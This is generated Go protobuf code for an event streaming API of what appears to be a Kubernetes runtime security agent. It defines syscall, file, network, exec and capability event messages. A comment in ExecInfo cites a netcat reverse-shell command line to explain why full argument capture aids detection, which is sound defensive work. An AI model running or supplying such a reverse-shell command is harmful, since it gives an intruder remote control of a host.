// Pahlevan's event streaming API.
//
// This is the integration surface. Until it existed, events reached a
// JSON-lines file and an HTTP webhook and nothing else, so integrating meant
// tailing a file on every node. A streaming API is what lets a collector,
// a SIEM shipper, or `pahlevan events` subscribe to one agent and receive
// events as they happen.
//
// The message shape deliberately mirrors the JSON envelope in pkg/export, so
// the two representations of an event cannot drift into telling different
// stories.

// Code generated by protoc-gen-go. DO NOT EDIT.
// versions:
// 	protoc-gen-go v1.36.11
// 	protoc        v3.21.12
// source: api/v1alpha1/events.proto

package apiv1alpha1

import (
	protoreflect "google.golang.org/protobuf/reflect/protoreflect"
	protoimpl "google.golang.org/protobuf/runtime/protoimpl"
	reflect "reflect"
	sync "sync"
	unsafe "unsafe"
)

const (
	// Verify that this generated code is sufficiently up-to-date.
	_ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion)
	// Verify that runtime/protoimpl is sufficiently up-to-date.
	_ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20)
)

type EventType int32

const (
	EventType_EVENT_TYPE_UNSPECIFIED EventType = 0
	EventType_EVENT_TYPE_SYSCALL     EventType = 1
	EventType_EVENT_TYPE_FILE        EventType = 2
	EventType_EVENT_TYPE_NETWORK     EventType = 3
	EventType_EVENT_TYPE_PROCESS     EventType = 4
	EventType_EVENT_TYPE_CAPABILITY  EventType = 5
)

// Enum value maps for EventType.
var (
	EventType_name = map[int32]string{
		0: "EVENT_TYPE_UNSPECIFIED",
		1: "EVENT_TYPE_SYSCALL",
		2: "EVENT_TYPE_FILE",
		3: "EVENT_TYPE_NETWORK",
		4: "EVENT_TYPE_PROCESS",
		5: "EVENT_TYPE_CAPABILITY",
	}
	EventType_value = map[string]int32{
		"EVENT_TYPE_UNSPECIFIED": 0,
		"EVENT_TYPE_SYSCALL":     1,
		"EVENT_TYPE_FILE":        2,
		"EVENT_TYPE_NETWORK":     3,
		"EVENT_TYPE_PROCESS":     4,
		"EVENT_TYPE_CAPABILITY":  5,
	}
)

func (x EventType) Enum() *EventType {
	p := new(EventType)
	*p = x
	return p
}

func (x EventType) String() string {
	return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x))
}

func (EventType) Descriptor() protoreflect.EnumDescriptor {
	return file_api_v1alpha1_events_proto_enumTypes[0].Descriptor()
}

func (EventType) Type() protoreflect.EnumType {
	return &file_api_v1alpha1_events_proto_enumTypes[0]
}

func (x EventType) Number() protoreflect.EnumNumber {
	return protoreflect.EnumNumber(x)
}

// Deprecated: Use EventType.Descriptor instead.
func (EventType) EnumDescriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{0}
}

type Action int32

const (
	Action_ACTION_UNSPECIFIED Action = 0
	// The operation was observed and allowed through.
	Action_ACTION_OBSERVE Action = 1
	// The operation was refused in-kernel with EPERM.
	Action_ACTION_DENY Action = 2
)

// Enum value maps for Action.
var (
	Action_name = map[int32]string{
		0: "ACTION_UNSPECIFIED",
		1: "ACTION_OBSERVE",
		2: "ACTION_DENY",
	}
	Action_value = map[string]int32{
		"ACTION_UNSPECIFIED": 0,
		"ACTION_OBSERVE":     1,
		"ACTION_DENY":        2,
	}
)

func (x Action) Enum() *Action {
	p := new(Action)
	*p = x
	return p
}

func (x Action) String() string {
	return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x))
}

func (Action) Descriptor() protoreflect.EnumDescriptor {
	return file_api_v1alpha1_events_proto_enumTypes[1].Descriptor()
}

func (Action) Type() protoreflect.EnumType {
	return &file_api_v1alpha1_events_proto_enumTypes[1]
}

func (x Action) Number() protoreflect.EnumNumber {
	return protoreflect.EnumNumber(x)
}

// Deprecated: Use Action.Descriptor instead.
func (Action) EnumDescriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{1}
}

type SubscribeRequest struct {
	state protoimpl.MessageState `protogen:"open.v1"`
	// Only these event kinds are sent. Empty means all of them.
	Types []EventType `protobuf:"varint,1,rep,packed,name=types,proto3,enum=pahlevan.v1alpha1.EventType" json:"types,omitempty"`
	// Only denials are sent. This is the common case for an alerting pipeline:
	// observations are high volume and denials are what needs a human.
	DenialsOnly bool `protobuf:"varint,2,opt,name=denials_only,json=denialsOnly,proto3" json:"denials_only,omitempty"`
	// Only events for pods in this namespace are sent. Empty means all.
	Namespace string `protobuf:"bytes,3,opt,name=namespace,proto3" json:"namespace,omitempty"`
	// Only events for this pod are sent. Empty means all.
	Pod           string `protobuf:"bytes,4,opt,name=pod,proto3" json:"pod,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *SubscribeRequest) Reset() {
	*x = SubscribeRequest{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[0]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *SubscribeRequest) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*SubscribeRequest) ProtoMessage() {}

func (x *SubscribeRequest) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[0]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use SubscribeRequest.ProtoReflect.Descriptor instead.
func (*SubscribeRequest) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{0}
}

func (x *SubscribeRequest) GetTypes() []EventType {
	if x != nil {
		return x.Types
	}
	return nil
}

func (x *SubscribeRequest) GetDenialsOnly() bool {
	if x != nil {
		return x.DenialsOnly
	}
	return false
}

func (x *SubscribeRequest) GetNamespace() string {
	if x != nil {
		return x.Namespace
	}
	return ""
}

func (x *SubscribeRequest) GetPod() string {
	if x != nil {
		return x.Pod
	}
	return ""
}

type Event struct {
	state   protoimpl.MessageState `protogen:"open.v1"`
	Version string                 `protobuf:"bytes,1,opt,name=version,proto3" json:"version,omitempty"`
	Type    EventType              `protobuf:"varint,2,opt,name=type,proto3,enum=pahlevan.v1alpha1.EventType" json:"type,omitempty"`
	Action  Action                 `protobuf:"varint,3,opt,name=action,proto3,enum=pahlevan.v1alpha1.Action" json:"action,omitempty"`
	// Wall-clock time the agent saw the event, RFC 3339.
	Timestamp string `protobuf:"bytes,4,opt,name=timestamp,proto3" json:"timestamp,omitempty"`
	// Monotonic kernel timestamp, for ordering within a node.
	KernelTimeNs uint64         `protobuf:"varint,5,opt,name=kernel_time_ns,json=kernelTimeNs,proto3" json:"kernel_time_ns,omitempty"`
	CgroupId     uint64         `protobuf:"varint,6,opt,name=cgroup_id,json=cgroupId,proto3" json:"cgroup_id,omitempty"`
	Source       string         `protobuf:"bytes,7,opt,name=source,proto3" json:"source,omitempty"`
	Process      *ProcessInfo   `protobuf:"bytes,8,opt,name=process,proto3" json:"process,omitempty"`
	Kubernetes   *KubernetesRef `protobuf:"bytes,9,opt,name=kubernetes,proto3" json:"kubernetes,omitempty"`
	// Types that are valid to be assigned to Detail:
	//
	//	*Event_Syscall
	//	*Event_File
	//	*Event_Network
	//	*Event_Exec
	//	*Event_Capability
	Detail        isEvent_Detail `protobuf_oneof:"detail"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *Event) Reset() {
	*x = Event{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[1]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *Event) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*Event) ProtoMessage() {}

func (x *Event) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[1]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use Event.ProtoReflect.Descriptor instead.
func (*Event) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{1}
}

func (x *Event) GetVersion() string {
	if x != nil {
		return x.Version
	}
	return ""
}

func (x *Event) GetType() EventType {
	if x != nil {
		return x.Type
	}
	return EventType_EVENT_TYPE_UNSPECIFIED
}

func (x *Event) GetAction() Action {
	if x != nil {
		return x.Action
	}
	return Action_ACTION_UNSPECIFIED
}

func (x *Event) GetTimestamp() string {
	if x != nil {
		return x.Timestamp
	}
	return ""
}

func (x *Event) GetKernelTimeNs() uint64 {
	if x != nil {
		return x.KernelTimeNs
	}
	return 0
}

func (x *Event) GetCgroupId() uint64 {
	if x != nil {
		return x.CgroupId
	}
	return 0
}

func (x *Event) GetSource() string {
	if x != nil {
		return x.Source
	}
	return ""
}

func (x *Event) GetProcess() *ProcessInfo {
	if x != nil {
		return x.Process
	}
	return nil
}

func (x *Event) GetKubernetes() *KubernetesRef {
	if x != nil {
		return x.Kubernetes
	}
	return nil
}

func (x *Event) GetDetail() isEvent_Detail {
	if x != nil {
		return x.Detail
	}
	return nil
}

func (x *Event) GetSyscall() *SyscallInfo {
	if x != nil {
		if x, ok := x.Detail.(*Event_Syscall); ok {
			return x.Syscall
		}
	}
	return nil
}

func (x *Event) GetFile() *FileInfo {
	if x != nil {
		if x, ok := x.Detail.(*Event_File); ok {
			return x.File
		}
	}
	return nil
}

func (x *Event) GetNetwork() *NetworkInfo {
	if x != nil {
		if x, ok := x.Detail.(*Event_Network); ok {
			return x.Network
		}
	}
	return nil
}

func (x *Event) GetExec() *ExecInfo {
	if x != nil {
		if x, ok := x.Detail.(*Event_Exec); ok {
			return x.Exec
		}
	}
	return nil
}

func (x *Event) GetCapability() *CapabilityInfo {
	if x != nil {
		if x, ok := x.Detail.(*Event_Capability); ok {
			return x.Capability
		}
	}
	return nil
}

type isEvent_Detail interface {
	isEvent_Detail()
}

type Event_Syscall struct {
	Syscall *SyscallInfo `protobuf:"bytes,10,opt,name=syscall,proto3,oneof"`
}

type Event_File struct {
	File *FileInfo `protobuf:"bytes,11,opt,name=file,proto3,oneof"`
}

type Event_Network struct {
	Network *NetworkInfo `protobuf:"bytes,12,opt,name=network,proto3,oneof"`
}

type Event_Exec struct {
	Exec *ExecInfo `protobuf:"bytes,13,opt,name=exec,proto3,oneof"`
}

type Event_Capability struct {
	Capability *CapabilityInfo `protobuf:"bytes,14,opt,name=capability,proto3,oneof"`
}

func (*Event_Syscall) isEvent_Detail() {}

func (*Event_File) isEvent_Detail() {}

func (*Event_Network) isEvent_Detail() {}

func (*Event_Exec) isEvent_Detail() {}

func (*Event_Capability) isEvent_Detail() {}

type ProcessInfo struct {
	state protoimpl.MessageState `protogen:"open.v1"`
	Pid   uint32                 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"`
	Tgid  uint32                 `protobuf:"varint,2,opt,name=tgid,proto3" json:"tgid,omitempty"`
	Uid   uint32                 `protobuf:"varint,3,opt,name=uid,proto3" json:"uid,omitempty"`
	Gid   uint32                 `protobuf:"varint,4,opt,name=gid,proto3" json:"gid,omitempty"`
	Comm  string                 `protobuf:"bytes,5,opt,name=comm,proto3" json:"comm,omitempty"`
	// Whoever caused this. A denied file open attributed only to "cat" says what
	// was refused and not who tried; with the parent it says a shell did.
	Ppid          uint32 `protobuf:"varint,6,opt,name=ppid,proto3" json:"ppid,omitempty"`
	ParentComm    string `protobuf:"bytes,7,opt,name=parent_comm,json=parentComm,proto3" json:"parent_comm,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *ProcessInfo) Reset() {
	*x = ProcessInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[2]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *ProcessInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*ProcessInfo) ProtoMessage() {}

func (x *ProcessInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[2]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use ProcessInfo.ProtoReflect.Descriptor instead.
func (*ProcessInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{2}
}

func (x *ProcessInfo) GetPid() uint32 {
	if x != nil {
		return x.Pid
	}
	return 0
}

func (x *ProcessInfo) GetTgid() uint32 {
	if x != nil {
		return x.Tgid
	}
	return 0
}

func (x *ProcessInfo) GetUid() uint32 {
	if x != nil {
		return x.Uid
	}
	return 0
}

func (x *ProcessInfo) GetGid() uint32 {
	if x != nil {
		return x.Gid
	}
	return 0
}

func (x *ProcessInfo) GetComm() string {
	if x != nil {
		return x.Comm
	}
	return ""
}

func (x *ProcessInfo) GetPpid() uint32 {
	if x != nil {
		return x.Ppid
	}
	return 0
}

func (x *ProcessInfo) GetParentComm() string {
	if x != nil {
		return x.ParentComm
	}
	return ""
}

type KubernetesRef struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Namespace     string                 `protobuf:"bytes,1,opt,name=namespace,proto3" json:"namespace,omitempty"`
	Pod           string                 `protobuf:"bytes,2,opt,name=pod,proto3" json:"pod,omitempty"`
	Container     string                 `protobuf:"bytes,3,opt,name=container,proto3" json:"container,omitempty"`
	PodUid        string                 `protobuf:"bytes,4,opt,name=pod_uid,json=podUid,proto3" json:"pod_uid,omitempty"`
	ContainerId   string                 `protobuf:"bytes,5,opt,name=container_id,json=containerId,proto3" json:"container_id,omitempty"`
	Runtime       string                 `protobuf:"bytes,6,opt,name=runtime,proto3" json:"runtime,omitempty"`
	QosClass      string                 `protobuf:"bytes,7,opt,name=qos_class,json=qosClass,proto3" json:"qos_class,omitempty"`
	Node          string                 `protobuf:"bytes,8,opt,name=node,proto3" json:"node,omitempty"`
	WorkloadKind  string                 `protobuf:"bytes,9,opt,name=workload_kind,json=workloadKind,proto3" json:"workload_kind,omitempty"`
	WorkloadName  string                 `protobuf:"bytes,10,opt,name=workload_name,json=workloadName,proto3" json:"workload_name,omitempty"`
	Labels        map[string]string      `protobuf:"bytes,11,rep,name=labels,proto3" json:"labels,omitempty" protobuf_key:"bytes,1,opt,name=key" protobuf_val:"bytes,2,opt,name=value"`
	Image         string                 `protobuf:"bytes,12,opt,name=image,proto3" json:"image,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *KubernetesRef) Reset() {
	*x = KubernetesRef{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[3]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *KubernetesRef) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*KubernetesRef) ProtoMessage() {}

func (x *KubernetesRef) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[3]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use KubernetesRef.ProtoReflect.Descriptor instead.
func (*KubernetesRef) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{3}
}

func (x *KubernetesRef) GetNamespace() string {
	if x != nil {
		return x.Namespace
	}
	return ""
}

func (x *KubernetesRef) GetPod() string {
	if x != nil {
		return x.Pod
	}
	return ""
}

func (x *KubernetesRef) GetContainer() string {
	if x != nil {
		return x.Container
	}
	return ""
}

func (x *KubernetesRef) GetPodUid() string {
	if x != nil {
		return x.PodUid
	}
	return ""
}

func (x *KubernetesRef) GetContainerId() string {
	if x != nil {
		return x.ContainerId
	}
	return ""
}

func (x *KubernetesRef) GetRuntime() string {
	if x != nil {
		return x.Runtime
	}
	return ""
}

func (x *KubernetesRef) GetQosClass() string {
	if x != nil {
		return x.QosClass
	}
	return ""
}

func (x *KubernetesRef) GetNode() string {
	if x != nil {
		return x.Node
	}
	return ""
}

func (x *KubernetesRef) GetWorkloadKind() string {
	if x != nil {
		return x.WorkloadKind
	}
	return ""
}

func (x *KubernetesRef) GetWorkloadName() string {
	if x != nil {
		return x.WorkloadName
	}
	return ""
}

func (x *KubernetesRef) GetLabels() map[string]string {
	if x != nil {
		return x.Labels
	}
	return nil
}

func (x *KubernetesRef) GetImage() string {
	if x != nil {
		return x.Image
	}
	return ""
}

type SyscallInfo struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Number        uint64                 `protobuf:"varint,1,opt,name=number,proto3" json:"number,omitempty"`
	Name          string                 `protobuf:"bytes,2,opt,name=name,proto3" json:"name,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *SyscallInfo) Reset() {
	*x = SyscallInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[4]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *SyscallInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*SyscallInfo) ProtoMessage() {}

func (x *SyscallInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[4]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use SyscallInfo.ProtoReflect.Descriptor instead.
func (*SyscallInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{4}
}

func (x *SyscallInfo) GetNumber() uint64 {
	if x != nil {
		return x.Number
	}
	return 0
}

func (x *SyscallInfo) GetName() string {
	if x != nil {
		return x.Name
	}
	return ""
}

type FileInfo struct {
	state protoimpl.MessageState `protogen:"open.v1"`
	Path  string                 `protobuf:"bytes,1,opt,name=path,proto3" json:"path,omitempty"`
	Flags uint32                 `protobuf:"varint,2,opt,name=flags,proto3" json:"flags,omitempty"`
	Mode  uint32                 `protobuf:"varint,3,opt,name=mode,proto3" json:"mode,omitempty"`
	// True when the open requested write access. Reads and writes are separate
	// allow-set entries, so this is part of the decision and not a detail.
	Write         bool `protobuf:"varint,4,opt,name=write,proto3" json:"write,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *FileInfo) Reset() {
	*x = FileInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[5]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *FileInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*FileInfo) ProtoMessage() {}

func (x *FileInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[5]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use FileInfo.ProtoReflect.Descriptor instead.
func (*FileInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{5}
}

func (x *FileInfo) GetPath() string {
	if x != nil {
		return x.Path
	}
	return ""
}

func (x *FileInfo) GetFlags() uint32 {
	if x != nil {
		return x.Flags
	}
	return 0
}

func (x *FileInfo) GetMode() uint32 {
	if x != nil {
		return x.Mode
	}
	return 0
}

func (x *FileInfo) GetWrite() bool {
	if x != nil {
		return x.Write
	}
	return false
}

type NetworkInfo struct {
	state           protoimpl.MessageState `protogen:"open.v1"`
	DestinationIp   string                 `protobuf:"bytes,1,opt,name=destination_ip,json=destinationIp,proto3" json:"destination_ip,omitempty"`
	DestinationPort uint32                 `protobuf:"varint,2,opt,name=destination_port,json=destinationPort,proto3" json:"destination_port,omitempty"`
	Protocol        string                 `protobuf:"bytes,3,opt,name=protocol,proto3" json:"protocol,omitempty"`
	ProtocolNumber  uint32                 `protobuf:"varint,4,opt,name=protocol_number,json=protocolNumber,proto3" json:"protocol_number,omitempty"`
	Direction       string                 `protobuf:"bytes,5,opt,name=direction,proto3" json:"direction,omitempty"`
	AddressFamily   string                 `protobuf:"bytes,6,opt,name=address_family,json=addressFamily,proto3" json:"address_family,omitempty"`
	unknownFields   protoimpl.UnknownFields
	sizeCache       protoimpl.SizeCache
}

func (x *NetworkInfo) Reset() {
	*x = NetworkInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[6]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *NetworkInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*NetworkInfo) ProtoMessage() {}

func (x *NetworkInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[6]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use NetworkInfo.ProtoReflect.Descriptor instead.
func (*NetworkInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{6}
}

func (x *NetworkInfo) GetDestinationIp() string {
	if x != nil {
		return x.DestinationIp
	}
	return ""
}

func (x *NetworkInfo) GetDestinationPort() uint32 {
	if x != nil {
		return x.DestinationPort
	}
	return 0
}

func (x *NetworkInfo) GetProtocol() string {
	if x != nil {
		return x.Protocol
	}
	return ""
}

func (x *NetworkInfo) GetProtocolNumber() uint32 {
	if x != nil {
		return x.ProtocolNumber
	}
	return 0
}

func (x *NetworkInfo) GetDirection() string {
	if x != nil {
		return x.Direction
	}
	return ""
}

func (x *NetworkInfo) GetAddressFamily() string {
	if x != nil {
		return x.AddressFamily
	}
	return ""
}

type ExecInfo struct {
	state  protoimpl.MessageState `protogen:"open.v1"`
	Binary string                 `protobuf:"bytes,1,opt,name=binary,proto3" json:"binary,omitempty"`
	// argv as the caller passed it. This is what separates "nc ran" from
	// "nc -e /bin/sh 10.0.0.1 4444".
	Args        []string `protobuf:"bytes,2,rep,name=args,proto3" json:"args,omitempty"`
	CommandLine string   `protobuf:"bytes,3,opt,name=command_line,json=commandLine,proto3" json:"command_line,omitempty"`
	// The command line did not fit the kernel's capture buffer, so args is a
	// prefix. A client must not read it as the whole invocation.
	ArgsTruncated bool `protobuf:"varint,4,opt,name=args_truncated,json=argsTruncated,proto3" json:"args_truncated,omitempty"`
	// Process lineage, nearest ancestor first.
	Ancestry      []*Ancestor `protobuf:"bytes,5,rep,name=ancestry,proto3" json:"ancestry,omitempty"`
	AncestryChain string      `protobuf:"bytes,6,opt,name=ancestry_chain,json=ancestryChain,proto3" json:"ancestry_chain,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *ExecInfo) Reset() {
	*x = ExecInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[7]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *ExecInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*ExecInfo) ProtoMessage() {}

func (x *ExecInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[7]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use ExecInfo.ProtoReflect.Descriptor instead.
func (*ExecInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{7}
}

func (x *ExecInfo) GetBinary() string {
	if x != nil {
		return x.Binary
	}
	return ""
}

func (x *ExecInfo) GetArgs() []string {
	if x != nil {
		return x.Args
	}
	return nil
}

func (x *ExecInfo) GetCommandLine() string {
	if x != nil {
		return x.CommandLine
	}
	return ""
}

func (x *ExecInfo) GetArgsTruncated() bool {
	if x != nil {
		return x.ArgsTruncated
	}
	return false
}

func (x *ExecInfo) GetAncestry() []*Ancestor {
	if x != nil {
		return x.Ancestry
	}
	return nil
}

func (x *ExecInfo) GetAncestryChain() string {
	if x != nil {
		return x.AncestryChain
	}
	return ""
}

type Ancestor struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Pid           uint32                 `protobuf:"varint,1,opt,name=pid,proto3" json:"pid,omitempty"`
	Comm          string                 `protobuf:"bytes,2,opt,name=comm,proto3" json:"comm,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *Ancestor) Reset() {
	*x = Ancestor{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[8]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *Ancestor) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*Ancestor) ProtoMessage() {}

func (x *Ancestor) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[8]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use Ancestor.ProtoReflect.Descriptor instead.
func (*Ancestor) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{8}
}

func (x *Ancestor) GetPid() uint32 {
	if x != nil {
		return x.Pid
	}
	return 0
}

func (x *Ancestor) GetComm() string {
	if x != nil {
		return x.Comm
	}
	return ""
}

type CapabilityInfo struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	Number        uint32                 `protobuf:"varint,1,opt,name=number,proto3" json:"number,omitempty"`
	Name          string                 `protobuf:"bytes,2,opt,name=name,proto3" json:"name,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *CapabilityInfo) Reset() {
	*x = CapabilityInfo{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[9]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *CapabilityInfo) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*CapabilityInfo) ProtoMessage() {}

func (x *CapabilityInfo) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[9]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use CapabilityInfo.ProtoReflect.Descriptor instead.
func (*CapabilityInfo) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{9}
}

func (x *CapabilityInfo) GetNumber() uint32 {
	if x != nil {
		return x.Number
	}
	return 0
}

func (x *CapabilityInfo) GetName() string {
	if x != nil {
		return x.Name
	}
	return ""
}

type StatusRequest struct {
	state         protoimpl.MessageState `protogen:"open.v1"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

func (x *StatusRequest) Reset() {
	*x = StatusRequest{}
	mi := &file_api_v1alpha1_events_proto_msgTypes[10]
	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
	ms.StoreMessageInfo(mi)
}

func (x *StatusRequest) String() string {
	return protoimpl.X.MessageStringOf(x)
}

func (*StatusRequest) ProtoMessage() {}

func (x *StatusRequest) ProtoReflect() protoreflect.Message {
	mi := &file_api_v1alpha1_events_proto_msgTypes[10]
	if x != nil {
		ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
		if ms.LoadMessageInfo() == nil {
			ms.StoreMessageInfo(mi)
		}
		return ms
	}
	return mi.MessageOf(x)
}

// Deprecated: Use StatusRequest.ProtoReflect.Descriptor instead.
func (*StatusRequest) Descriptor() ([]byte, []int) {
	return file_api_v1alpha1_events_proto_rawDescGZIP(), []int{10}
}

type StatusResponse struct {
	state protoimpl.MessageState `protogen:"open.v1"`
	Node  string                 `protobuf:"bytes,1,opt,name=node,proto3" json:"node,omitempty"`
	// Containers the agent is tracking, and how many have reached enforcement.
	// A fleet tracking containers and enforcing none of them is the quietest
	// possible failure, so it is reported rather than inferred.
	ContainersTracked   int32 `protobuf:"varint,2,opt,name=containers_tracked,json=containersTracked,proto3" json:"containers_tracked,omitempty"`
	ContainersLearning  int32 `protobuf:"varint,3,opt,name=containers_learning,json=containersLearning,proto3" json:"containers_learning,omitempty"`
	ContainersEnforcing int32 `protobuf:"varint,4,opt,name=containers_enforcing,json=containersEnforcing,proto3" json:"containers_enforcing,omitempty"`
	// Subscribers currently attached, and events dropped because a subscriber
	// could not keep up. Dropped events are counted, never silent.
	Subscribers   int32  `protobuf:"varint,5,opt,name=subscribers,proto3" json:"subscribers,omitempty"`
	EventsDropped uint64 `protobuf:"varint,6,opt,name=events_dropped,json=eventsDropped,proto3" json:"events_dropped,omitempty"`
	Version       string `protobuf:"bytes,7,opt,name=version,proto3" json:"version,omitempty"`
	unknownFields protoimpl.UnknownFields
	sizeCache     protoimpl.SizeCache
}

